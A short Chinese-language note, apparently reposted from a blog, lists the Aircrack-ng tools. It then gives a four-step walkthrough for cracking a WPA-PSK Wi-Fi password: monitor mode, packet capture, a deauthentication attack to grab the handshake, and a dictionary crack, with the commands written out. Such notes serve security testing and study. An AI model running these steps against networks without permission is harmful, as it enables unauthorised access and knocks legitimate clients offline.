Aircrack-ng包含的组件具体列表
aircrack-ng 主要用于WEP及WPA-PSK密码的恢复
airmon-ng 用于改变无线网卡工作模式,以便其他工具的顺利使用
airodump-ng 用于捕获802.11数据报文,以便于aircrack-ng破解
aireplay-ng 创建特殊的无线网络数据报文及流量
airserv-ng 可以将无线网卡连接至某一特定端口,为攻击时灵活调用做准备
airolib-ng 进行WPA
Rainbow
Table攻击时使用,用于建立特定数据库文件
airdecap- ng用于解开处于加密状态的数据包
tools 其他用于辅助的工具,如airdriver-ng、packetforge-ng
步骤一:airmon-ng start wlan0
激活网卡到monitor模式
显示“monitor mode enabled on
mon0”表示成功
步骤二:airodump-ng --channe l1 --bssid mac -w pmk mon0
--channel 11表示无线信道
11
-w pmk 表示写到文件中pmk中
--bssid ap的mac
mon0 为之前已经载入并激活监听模式的无线网卡
步骤三:aireplay-ng -0 1 –a AP的mac -c 客户端的mac mon0
airodump-ng 界面显示“WPA
handshake”,表示获得到了WPA-PSK 4此握手数据报文
-0 采用deauth攻击模式,后面跟上攻击次数
mon0 一定要用而不能用 wlan1 否则会报错
ARP linktype is set to 1 (Ethernet) - expected
ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run ‘airmon-ng start wlan0 <#>‘
Sysfs
injection support was not found either.
步骤四:aircrack-ng -w dic 捕获的cap文件
-w 后跟预先制作的字典文件
Aircrack-ng笔记,码迷,mamicode.com